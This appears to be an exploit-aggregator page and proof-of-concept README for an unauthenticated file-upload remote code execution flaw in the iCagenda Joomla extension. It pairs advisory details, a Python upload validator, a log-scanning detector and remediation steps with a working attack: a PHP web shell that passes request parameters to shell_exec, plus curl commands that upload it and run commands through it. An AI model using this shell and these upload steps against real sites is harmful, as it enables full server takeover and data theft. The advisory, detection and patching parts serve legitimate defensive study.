| Title | Published | Source |
|---|---|---|
| Exploit for CVE-2026-48939 | 29 Jun 2026 11:09 | githubexploit |
| CVE-2026-48939 | 20 Jun 2026 11:56 | attackerkb |
| CVE-2026-48939 | 20 Jun 2026 13:44 | circl |
| CVE-2026-48939 | 20 Jun 2026 11:56 | cve |
| CVE-2026-48939 Joomla Extension - icagenda.com - Remote Code Execution in iCagenda extension for Joomla < 4.0.8/3.9.15 | 20 Jun 2026 11:56 | cvelist |
| EUVD-2026-38109 | 20 Jun 2026 11:56 | euvd |
| CVE-2026-48939 | 20 Jun 2026 13:16 | nvd |
| PT-2026-51137 | 20 Jun 2026 00:00 | ptsecurity |
| CVE-2026-48939 Joomla Extension - icagenda.com - Remote Code Execution in iCagenda extension for Joomla < 4.0.8/3.9.15 | 20 Jun 2026 11:56 | vulnrichment |

# CVE-2026-48939 - iCagenda Unauthenticated File Upload to RCE
## Overview
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-48939 |
| **CVSS 4.0 Score** | 10.0 Critical |
| **CVSS Vector** | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| **CWE** | CWE-284: Improper Access Control |
| **Affected Versions** | iCagenda 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7 |
| **Fixed In** | iCagenda 4.0.8 and 3.9.15 |
| **Published** | 20 June 2026 |
## Vulnerability Description
iCagenda, a popular events and calendar component for Joomla, contains an unauthenticated file upload vulnerability that allows remote attackers to upload and execute arbitrary PHP code on Joomla 6 sites.
### Technical Details
The vulnerability exists in the frontend event submission form's file attachment feature:
1. **Missing Access Control**: The submit endpoint (`index.php?option=com_icagenda&task=registration.submit`) does not enforce authentication, bypassing the "Registered Only" access setting.
2. **No File Validation**: Uploaded files are saved with their original extension without:
   - Extension allowlist validation
   - MIME type verification
   - File content inspection
3. **Direct File Write**: Files are written to `/images/icagenda/frontend/attachments/[filename]` directly under the web root.
4. **PHP Execution**: On Joomla 6, the uploaded `.php` files are executable, leading to Remote Code Execution (RCE).
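The three checks listed above as missing, implemented as an added example (this is illustrative Python, not iCagenda's code; the allowlist and magic-byte table are constructed assumptions):

```python
import re
from typing import Tuple

# Constructed allowlist (an assumption, not iCagenda's policy): extension -> required leading bytes.
ALLOWED_MAGIC = {
    "pdf": b"%PDF-",
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_attachment(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for an uploaded attachment.

    Applies the checks the advisory says the vulnerable code lacked: an
    extension allowlist, declared-type vs. content verification, and a
    content inspection for a PHP open tag.
    """
    # Use only the basename so path components in the client-supplied name are ignored.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.split(".")
    if len(parts) != 2:  # no extension, or a double extension such as shell.php.png
        return False, "filename must be name.ext with exactly one extension"
    stem, ext = parts[0], parts[1].lower()
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in filename"
    if ext not in ALLOWED_MAGIC:
        return False, f"extension .{ext} not in allowlist"
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match the declared type"
    if b"<?php" in data:
        return False, "embedded PHP open tag"
    return True, "ok"
```

Validation alone is not a complete fix: the directory the files land in should also not be served with PHP execution enabled, and the endpoint must enforce the "Registered Only" access check.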
## Proof of Concept
### Method 1: Using curl (Single Command)
```bash
# Create PHP shell payload
cat > /tmp/shell.php << 'EOF'
<?php
echo "CVE-2026-48939 - SHELL ACTIVE\n";
if(isset($_GET['cmd'])) {
echo shell_exec($_GET['cmd'] . " 2>&1");
}
?>
EOF
# Upload the shell
curl -k -s \
-F "title=Test Event" \
-F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
"https://poloss-jomola.ddev.site/icagenda_submit.php"
# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
```
### Method 2: Using PoC Script
```bash
# Navigate to project directory
# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
```
## Exploitation Steps
1. **Identify vulnerable endpoint**:
```
https://target.com/index.php?option=com_icagenda&task=submit
```
2. **Upload PHP web shell**:
```bash
curl -X POST -F "jform[attachment]=@shell.php" \
"https://target.com/index.php?option=com_icagenda&task=submit"
```
3. **Execute shell**:
```bash
curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
```
## Impact
- **Confidentiality**: Complete loss of confidentiality - attacker can read all files
- **Integrity**: Complete loss of integrity - attacker can modify all data
- **Availability**: Complete loss of availability - attacker can deny service
- **Remote Code Execution**: Full server compromise
## Attack Signature
Based on real-world exploitation logs, the attack signature is:
```
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"
# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0
```
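Detection logic for the signature above, as an added example (not from the advisory): it scans Apache combined-format lines for the submission POST and for any script fetched from the attachments directory, and raises severity when the same client did both. The log lines are constructed sample data.

```python
import re
from collections import defaultdict

# Constructed Apache combined-log lines (sample data, not the advisory's real logs).
SAMPLE_LOG = """\
203.0.113.7 - - [20/Jun/2026:11:58:01 +0000] "POST /index.php?option=com_icagenda&task=submit HTTP/1.1" 303 512 "-" "icagenda-batch/1.0"
203.0.113.7 - - [20/Jun/2026:11:58:04 +0000] "GET /images/icagenda/frontend/attachments/shell_1782456720.php?cmd=id HTTP/1.1" 200 87 "-" "icagenda-batch/1.0"
198.51.100.3 - - [20/Jun/2026:12:00:10 +0000] "GET /images/icagenda/frontend/attachments/flyer.pdf HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
198.51.100.9 - - [20/Jun/2026:12:05:42 +0000] "POST /index.php?option=com_icagenda&task=registration.submit HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
                  r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Both task names seen on this page for the submission endpoint.
UPLOAD = re.compile(r"^/index\.php\?(?=.*\boption=com_icagenda\b)(?=.*\btask=(registration\.)?submit\b)")
# Nothing executable should ever be served from the attachments directory.
ATTACH_PHP = re.compile(r"^/images/icagenda/frontend/attachments/[^?]*\.ph(p\d?|tml|ar)(\?|$)", re.I)


def scan(log_text):
    """Return findings as (severity, ip, reason) tuples in log order."""
    uploads = defaultdict(list)
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, path, ua = m["ip"], m["path"], m["ua"]
        if m["method"] == "POST" and UPLOAD.match(path):
            uploads[ip].append(m["ts"])
            sev = "high" if ua.startswith("icagenda-batch/") else "medium"
            findings.append((sev, ip, "event submission POST (unauthenticated upload path)"))
        elif ATTACH_PHP.match(path):
            sev = "critical" if ip in uploads else "high"
            findings.append((sev, ip, f"script requested from attachments dir: {path.split('?')[0]}"))
    return findings
```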
## Remediation
1. **Immediate**: Update iCagenda to version 4.0.8 (or 3.9.15 for legacy branch)
2. **Alternative**: Remove or rename `com_icagenda` folders temporarily
3. **Note**: Unpublishing the component does NOT protect against this vulnerability
## References
- [iCagenda Zero Day RCE - mysites.guru](https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/)
- [iCagenda Official](https://www.icagenda.com/)
- [Changelog 4.0.8](https://www.icagenda.com/docs/changelog/icagenda-4-0-8)
- [CISA ADP Advisory](https://www.cisa.gov/news-events/alerts)
## Disclaimer
This PoC is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.